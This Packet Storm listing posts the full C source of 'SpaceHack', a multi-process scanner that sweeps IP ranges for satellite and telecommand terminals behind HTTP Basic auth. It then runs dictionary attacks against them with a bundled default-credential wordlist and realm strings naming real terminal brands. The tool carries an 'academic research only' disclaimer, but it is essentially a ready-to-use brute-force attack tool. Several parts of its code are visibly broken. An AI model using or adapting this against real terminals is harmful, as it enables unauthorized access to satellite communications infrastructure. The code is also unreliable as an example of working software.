the original cloud security

SpaceHack Satellite Terminal Scanner

SpaceHack Satellite Terminal Scanner
Posted Nov 17, 2016
Authored by Nicholas Lemonias

This tool can be used to find insecure satellite terminals and "Telecommand and Control" terminals in a network.

tags | tool, scanner
systems | unix
MD5 | b7d56025d18986f06f0994da75107cfc

SpaceHack Satellite Terminal Scanner

Change Mirror Download
/*
** File: spacehack.c
** =====================================================
**
** 17/11/2016 Author: Nicholas Lemonias
**
**
** This is proprietary source code material of Advanced
** Information Security Corporation.
**
**
**
**
** Copyright (c) 2009-2016, Advanced Information Security Corporation
**
**
**
**
**
** " A Space telecommand Station can transmit to a station in Space operations. The following frequency bands and segments are authorized for telecommand stations:
** 17 m, 15 m, 12 m and 10 m bands, 6 mm, 4 mm, 2 mm and 1 mm bands. The above frequencies are to be reviewed in the admin config of a potential terminal.
**
** 7.0–7.1 MHz, 14.00–14.25 MHz, 144–146 MHz, 435–438 MHz, 1260–1270 MHz and 2400–2450 MHz, 3.40–3.41 GHz, 5.65–5.67 GHz, 10.45–10.50 GHz and 24.00–24.05 GHz segments
**
** The aim of this tool is to find insecure satellite terminals and Telecommand&Control terminals in a network.
**
**
**
** ~ Greets to PacketStorm Security
**
**
** This research demo is for academic research purposes ONLY. You may only use this software for
** educational purposes, or for the purpose of academic research.
**
** #@#@~ Scope
**
** Point-to-Multipoint Networks / Telecommand & Control Earth Stations
** Star-Networks,
** Wireless Mesh Networks
**
**
** Test Features:
**
** Base 64 Encoding/Decoding
** Basic Auth/ Dictionary attacks
** Multi-threading
** Single IP and Subnet Scanning
**
**
**
*/

/*
** Keeping Things Simple!
**
*/


/*
******************************************************************
(c) 2016 Advanced Information Security Corporation
******************************************************************
*/

/*
** Compilation: cc spacehack.c –o spacehack
**
**
** Usage: ./spacehack -i [IP:PORT] -f [user:pass wordlist.txt]
** -s <Read ip's from stdin>
** -i Single IP
** -v [realm.txt] Satellite realms
** -a xx (Class A)
** -b xxx.xx (Class B)
** -c xxx.xxx.xxx (Class C,D,E)
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
// #include <optarg.h>
#include <unistd.h>
#include <stdint.h>
#include <arpa/inet.h>
#include <sys/errno.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <netdb.h>
#include <openssl/pem.h>
#include <string.h>

#define PORT 80
#define TIMEOUT 3

//char *result;
//char *REALM = NULL;

void usage(char *);
void try(char *);
void encodeAndSend(char*,char*);
char server[500];

//static int i;
static int x,y,z;

char A(char *);
char B(char *);
char C(char *);
char D(char *);
//static char a[4],b[8],c[12],
static char ip[17];


char *base64encode (const void *b64_encode_this, int encode_this_many_bytes){
BIO *b64_bio, *mem_bio; //Declares two OpenSSL BIOs: a base64 filter and a memory BIO.
BUF_MEM *mem_bio_mem_ptr; //Pointer to a "memory BIO" structure holding our base64 data.
b64_bio = BIO_new(BIO_f_base64()); //Initialize our base64 filter BIO.
mem_bio = BIO_new(BIO_s_mem()); //Initialize our memory sink BIO.
BIO_push(b64_bio, mem_bio); //Link the BIOs by creating a filter-sink BIO chain.
BIO_set_flags(b64_bio, BIO_FLAGS_BASE64_NO_NL); //No newlines every 64 characters or less.
BIO_write(b64_bio, b64_encode_this, encode_this_many_bytes); //Records base64 encoded data.
BIO_flush(b64_bio); //Flush data. Necessary for b64 encoding, because of pad characters.
BIO_get_mem_ptr(mem_bio, &mem_bio_mem_ptr); //Store address of mem_bio's memory structure.
BIO_set_close(mem_bio, BIO_NOCLOSE); //Permit access to mem_ptr after BIOs are destroyed.
BIO_free_all(b64_bio); //Destroys all BIOs in chain, starting with b64 (i.e. the 1st one).
BUF_MEM_grow(mem_bio_mem_ptr, (*mem_bio_mem_ptr).length + 1); //Makes space for end null.
(*mem_bio_mem_ptr).data[(*mem_bio_mem_ptr).length] = '\0'; //Adds null-terminator to tail.
return (*mem_bio_mem_ptr).data; //Returns base-64 encoded data. (See: "buf_mem_st" struct).
}


char *base64decode (const void *b64_decode_this, int decode_this_many_bytes){
BIO *b64_bio, *mem_bio; //Declares two OpenSSL BIOs: a base64 filter and a memory BIO.
char *base64_decoded = calloc( (decode_this_many_bytes*3)/4+1, sizeof(char) ); //+1 = null.
b64_bio = BIO_new(BIO_f_base64()); //Initialize our base64 filter BIO.
mem_bio = BIO_new(BIO_s_mem()); //Initialize our memory source BIO.
BIO_write(mem_bio, b64_decode_this, decode_this_many_bytes); //Base64 data saved in source.
BIO_push(b64_bio, mem_bio); //Link the BIOs by creating a filter-source BIO chain.
BIO_set_flags(b64_bio, BIO_FLAGS_BASE64_NO_NL); //Don't require trailing newlines.
int decoded_byte_index = 0; //Index where the next base64_decoded byte should be written.

while ( 0 < BIO_read(b64_bio, base64_decoded+decoded_byte_index, 1) ){ //Read byte-by-byte.
decoded_byte_index++; //Increment the index until read of BIO decoded data is complete.
} //Once we're done reading decoded data, BIO_read returns -1 even though there's no error.

BIO_free_all(b64_bio); //Destroys all BIOs in chain, starting with b64 (i.e. the 1st one).
return base64_decoded; //Returns base-64 decoded data with trailing null terminator.
}


void usage(char *pn) {
printf("***********************************************************************\n");
printf("(Advanced Information Security Corporation, 2016 - All Rights Reserved*\n");
printf("***********************************************************************\n");
printf("* *\n");
printf("* SPACEHACK - SECURITY RESEARCH TOOL *\n");
printf("***********************************************************************\n");
printf("* Disclaimer: This is proprietary source code material of Advanced *\n");
printf("* Information Security Corporation. This software is for *\n");
printf("* research purposes only. *\n");
printf("***********************************************************************\n");
printf("\n");
printf("\nUsage:\n%s\t-s <STDIN> -i <IP:port> -f <wordlist> -a <Class A> -b <Class B> -c <Class C> -v <realm>\n",pn);
printf("\t-C <maxchilds> to increase from default of 25\n");
exit(0);
}


char *data_to_encode;
int bytes_to_encode; //Number of bytes in string to base64 encode.
char *base64_encoded; //Base-64 encoding.
int bytes_to_decode; //Number of bytes in string to base64 decode.
char *base64_decoded; //Base-64 decoding.


int main(int argc, char *argv[]) {

int ch, pid, std1n, vsat, ascan, bscan, cscan, ipscan, fileFound; //temp = 0;
char* temp;
char IP[128], printip[128];

int childs = 1;
int maxchilds = 1;

if (argc < 2) {
usage(argv[0]);
}

/*
data_to_encode = argv[4];
bytes_to_encode = strlen(data_to_encode);
base64_encoded = base64encode(data_to_encode, bytes_to_encode);
bytes_to_decode = strlen(base64_encoded);
base64_decoded = base64decode(base64_encoded, bytes_to_decode);
**/



strncpy(IP, argv[2], sizeof(IP));
printf("%s\n", IP);
//try(IP);

while ((ch = getopt(argc, argv, "i:a:b:c:C:s:f")) != EOF) {
switch (ch) {
case 'i':
bzero(IP, sizeof(IP));
strncpy(IP, optarg, sizeof(IP));
if ((temp=strrchr(IP, '\n')) != NULL)
{
bzero((void *)temp, 1);
strncpy(printip, IP, (sizeof(IP) -1));
strncpy(IP, printip, sizeof(printip));
}
ipscan = 1;
break;
case 'a':
bzero(IP, sizeof(IP));
strncpy(IP, optarg, sizeof(IP));
if ((temp=strrchr(IP, '\n')) != NULL)
{
bzero((void *)temp, 1);
strncpy(printip, IP, (sizeof(IP) -1));
strncpy(IP, printip, sizeof(printip));
}
ascan = 1;
break;
case 'b':
bzero(IP, sizeof(IP));
strncpy(IP, optarg, sizeof(IP));
if ((temp=strrchr(IP, '\n')) != NULL)
{
bzero((void *)temp, 1);
strncpy(printip, IP, (sizeof(IP) -1));
strncpy(IP, printip, sizeof(printip));
}
bscan = 1;
break;
case 'c':
bzero(IP, sizeof(IP));
strncpy(IP, optarg, sizeof(IP));
if ((temp=strrchr(IP, '\n')) != NULL)
{
bzero((void *)temp, 1);
strncpy(printip, IP, (sizeof(IP) -1));
strncpy(IP, printip, sizeof(printip));
}
cscan = 1;
break;
case 's':
std1n = 1;
break;
case 'C':
maxchilds = atoi(optarg);
break;
case 'v':
vsat = 1;
break;
case 'f':
fileFound = 1;
break;
default:
usage(argv[0]);
break;
}
}

if(ipscan != 1){
usage(argv[0]);
}

if(ipscan != 1 && maxchilds <= 1) {
maxchilds = 25;
}

printf("Scanning with %d children\n", maxchilds);

if(ipscan == 1 && fileFound == 1){

char fileName[1000] = "";
if(strlen(argv[4]) > 999){
printf("Too big fileName\n");
exit(0);
}

strcat(fileName, argv[4]);

encodeAndSend(fileName, IP);
exit(1);
}


if (ipscan == 1) {
printf("Scanning IP %s\n", IP);
try(IP);
exit(1);
}
if (ascan == 1) {
printf("Scanning class A %s.\n", IP);

if(strlen(IP)>3) {
printf("wrong range");
exit(-1);
}

for(x=0;x<=255;++x) {
for(y=0;y<=255;++y) {
for(z=0;z<=255;++z) {
snprintf(ip,sizeof(ip),"%s.%d.%d.%d",IP,x,y,z);

switch(pid=fork()) {
case 0:
//printf("trying %s\t->\t",ip);
try(ip);
exit(1);
break;
case -1:
printf("cannot fork requested number of children\n");
exit(0);
break;
default:
childs++;
if (childs >= maxchilds){
wait(NULL);
}
break;
}
}
}
}

printf("Completed Class A scan\n");
fflush(stdout);
exit(1);
}

if (bscan == 1) {
printf("Scanning class B %s.\n", IP);
for(y=0;y<=255;++y) {
for(z=0;z<=255;++z) {
snprintf(ip,sizeof(ip),"%s.%d.%d",IP,y,z);
switch(pid=fork()) {
case 0:
//printf("trying %s\t->\t",ip);
try(ip);
exit(1);
break;
case -1:
printf("cannot fork requested number of children\n");
exit(0);
break;
default:
childs++;
if (childs >= maxchilds){
wait(NULL);
}
break;
}
}
}
printf("Completed Class B scan\n");
fflush(stdout);
exit(1);
}

if (cscan == 1) {
for(z=0;z<=255;++z) {
if( !strcmp(ip,".4") ){
exit(EXIT_FAILURE);
}
snprintf(ip,sizeof(ip),"%s.%d",IP,z);

switch(pid=fork()) {
case 0:
//printf("trying %s\t->\t",ip);
try(ip);
exit(1);
break;
case -1:
printf("cannot fork requested number of children\n");
exit(0);
break;
default:
childs++;
if (childs >= maxchilds){
wait(NULL);
}
break;
}
}

printf("Completed Class C scan\n");
fflush(stdout);
exit(1);
}
if (std1n == 1) {
//opening file for reading
FILE *file;
file = fopen(argv[2], "r");

//checking that file exists
if(file == NULL){
printf("Cannot open file\n");
exit(-1);
}

printf("Reading IP's from FILE\n");
while(!feof(file)) {
while ((fgets(IP, sizeof(IP), file)) != NULL){
switch(pid=fork()) {
case 0:
printf("Scanning IP %s.\n", IP);
try(IP);
exit(1);
break;
case -1:
printf("cannot fork requested number ofchildren\n");
exit(0);
break;
default:
childs++;
if (childs >= maxchilds){
wait(NULL);
}
break;
}
}
}

char* s;

if (vsat == 1) {
printf("Reading VSAT Realm file from STDIN\n");
while(!feof(stdin)) {
while ((fgets(s, sizeof(char), stdin)) != NULL){
switch(pid=fork()) {
case 0:
printf("Loading realm \n");
exit(1);
break;
case -1:
printf("cannot fork requested number of children\n");
exit(0);
break;
default:
childs++;
if (childs >= maxchilds){
wait(NULL);
}
break;
}
}
}
}

printf("Complete!\n");
exit(1);
}

exit(0); // should never reach here, but...
}

void try(char *IP) {
int sock;
int numbytes = 0 , opt;
int portno = 80;
struct sockaddr_in serv_addr;
struct hostent *host;
fd_set wset;
fd_set rset;
struct timeval tv;

//fix IP to include ONLY the IP and not the port number
IP[strlen(IP) - 3] = '\0';

sock = socket(AF_INET,SOCK_STREAM,0);
if (sock == -1) {
printf("%s socket creation error\n", IP);
return;
}

host = gethostbyname(IP);
if(host == NULL){
printf("Error invalid IP\n");
exit(-1);
}

bzero((char *) &serv_addr, sizeof(serv_addr));
bcopy((char*)host->h_addr, (char*)&serv_addr.sin_addr.s_addr,host->h_length);
serv_addr.sin_port = htons(portno);

printf("IP: %s, port: %d\n\n", IP, PORT);

FD_ZERO( &wset );
FD_SET( sock , &wset );

FD_ZERO( &rset );
FD_SET( sock, &rset);
tv.tv_sec = TIMEOUT;
tv.tv_usec = 0;

if( fcntl( sock , F_SETFL , O_NONBLOCK ) == -1 ) {
printf("%s fcntl error\n", IP);
return;
}

if(connect(sock, &serv_addr, sizeof(serv_addr)) < 0){
printf("error connecting\n");
}

opt = select(sock+1,&rset,&wset,NULL,&tv);

if( fcntl( sock , F_SETFL , 0 ) == -1 ) {
printf("%s fcntl error\n", IP);
return;
}

if( opt == -1 ) {
printf("%s select error\n", IP);
return;
}

if( !opt ) {
printf("%s connection timed out..\n", IP);
return;
}

numbytes = recv(sock,server,sizeof(server),0);

printf("Done recving..\n\n");

if( numbytes == -1 ) {
printf("IP:%s Cant read anything from that host\n",IP);
return;
}

server[numbytes]='\0';

printf("%s\n\n", server);

if(strlen(server) == 0) {
printf("%s connection closed\n", IP);
return;
}

if (strstr(server, "401")) {
printf("[x]~ 401 HTTP Code Identified. Authenticated terminal.\n\n");
//result = strstr(server,REALM);
}else{
printf("host %s does not have a matching realm\n", IP);
exit(-1);
}

char buffer[500];
printf("[x] Stage 2 - Found matching realm on %s\n\n", IP);
printf("[x] Stage 3 - Cracking Satellite Terminal: %s\n\n", IP);
printf("Original character string is: %s\n\n", data_to_encode); //Prints our initial string.
printf("Base-64 encoded string is: %s\n\n", base64_encoded); //Prints base64 encoded string.
printf("Base-64 decoded string is: %s\n\n", base64_decoded); //Prints base64 decoded string.
strcpy(buffer,"GET /mywebsite/login.html/ HTTP1.1 \n\n");
strcat(buffer,"Host: localhost\n\n");
strcat(buffer,"Connection: keep-alive\n\n");
strcat(buffer,"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11\n\n");
strcat(buffer,"Accept: text/html,application/xhtml+xml,application/xml;q=0.9;q=0.8\n\n");
strcat(buffer,"Accept-Encoding: gzip,deflate,sdch\n\n");
strcat(buffer,"Accept-Language: en-US,en;q=0.8\n\n");
strcat(buffer,"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\n\n");
size_t status = send(sock, buffer, strlen(buffer), MSG_NOSIGNAL);

if(status == -1) {
printf("Error in send().\n");
exit(1);
}

buffer[0] = '\0';

//The receiving functions
status = recv(sock, buffer, sizeof(buffer), 0);
if (status == -1) {
printf("Error in recv().\n");
exit(1);
}

buffer[status] = '\0';
printf("The message received is: ");
printf("%s\n\n", buffer);

//encoding the received username:pass pair
char* base64_encoded = base64encode(buffer, strlen(buffer));


strcpy(buffer,"GET /mywebsite/login.html/ HTTP1.1\n\n");
strcat(buffer,"Host: localhost\n\n");
strcat(buffer,"Authorization: Basic == \n\n");
strcat(buffer,base64_encoded);
strcat(buffer,"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11\n\n");
strcat(buffer,"Accept: text/html,application/xhtml+xml,application/xml;q=0.9;q=0.8\n\n");
strcat(buffer,"Accept-Encoding: gzip,deflate,sdch\n\n");
strcat(buffer,"Accept-Language: en-US,en;q=0.8\n\n");
strcat(buffer,"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\n\n");
strcat(buffer,"Connection: keep-alive\n\n");
status = send(sock, buffer, sizeof(buffer), MSG_NOSIGNAL);

if(status == -1) {
printf("Error in send().\n");
exit(1);
}
buffer[0]='\0';
//The receiving functions
status = recv(sock, buffer, sizeof(buffer), 0);
if (status == -1) {
printf("Error in recv()\n");
exit(1);
}
buffer[status] = '\0';
printf("%s\n\n", buffer);
buffer[0]='\0';

free(base64_encoded);
free(base64_decoded);

// *(strchr(result, '\n')) = '\0';
// printf("%s %s\n", IP, result);

return;
}

void encodeAndSend(char *fileName, char *IP){

//checking if file exitst
FILE* file = NULL;
if((file = fopen(fileName, "r")) == NULL){
printf("file: %s ,does not exist, check spelling \n", fileName);
return;
}

//variables for socket and connecting with host
int sock;
struct sockaddr_in serv_addr;
struct hostent *host;
int portno = PORT;

//fixing ip array to contain only the ip
IP[strlen(IP) - 3] = '\0';

//creating socket and getting ready for connection
sock = socket(AF_INET,SOCK_STREAM,0);
if (sock == -1) {
printf("%s socket creation error\n", IP);
return;
}
host = gethostbyname(IP);
if(host == NULL){
printf("Error invalid IP\n");
return;
}
bzero((char *) &serv_addr, sizeof(serv_addr));
bcopy((char*)host->h_addr, (char*)&serv_addr.sin_addr.s_addr,host->h_length);
serv_addr.sin_port = htons(portno);

//connecting
if(connect(sock, &serv_addr, sizeof(serv_addr)) < 0){
printf("error connecting\n");
return;
}

char *base64_encoded;
char line[500];
int status = 0;

//reading one line at a time
while(*fgets(line, sizeof(line), file) != EOF){
*(strchr(line, '\n')) = '\0';
base64_encoded = base64encode(line, strlen(line));

//building buffer
char buffer[1000] = "Authorization: Basic ";
strcat(buffer, line);

printf("Input = %s, encoded = %s, buffertosend = %s\n", line, base64_encoded, buffer);

//sending buffer, it contains header, encode username:password
status = send(sock, buffer, sizeof(buffer), MSG_NOSIGNAL);

if(status == -1) {
printf("Error in send().\n");
exit(1);
}

printf("send succesfull\n");
}
}




/*
******************************************************************
realm.txt - Demo sample - Please update
******************************************************************

Basic realm="SatLink VSAT"
Basic realm="SatLink Terminal"
Basic realm="Satellite Modem Restricted Area - Login Required"
Basic realm="SAILOR 500 FleetBroadband"
Basic realm="HUGHES Terminal"
Basic realm="SAILOR 900 V-SAT"
Basic realm="Space Station"
/*


/*
*****************************************************************
wordlist.txt - - Demo sample - Please update
******************************************************************

admin:123456
admin:12345
admin:password
admin:password1
admin:@@Passwo
admin:@@Password@@
admin:admin12
admin:111111
admin:admin
admin:admin1
admin:admin123
sailorsailor:admin
sailorsailor:12345
sailorsailor:123456
user:12345
user:user1
user:user
admin:avanti

*/

CommentsRSS Feed

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    15 Files
  • 2
    Oct 2nd
    16 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    11 Files
  • 6
    Oct 6th
    6 Files
  • 7
    Oct 7th
    2 Files
  • 8
    Oct 8th
    1 Files
  • 9
    Oct 9th
    13 Files
  • 10
    Oct 10th
    16 Files
  • 11
    Oct 11th
    15 Files
  • 12
    Oct 12th
    23 Files
  • 13
    Oct 13th
    13 Files
  • 14
    Oct 14th
    12 Files
  • 15
    Oct 15th
    2 Files
  • 16
    Oct 16th
    5 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close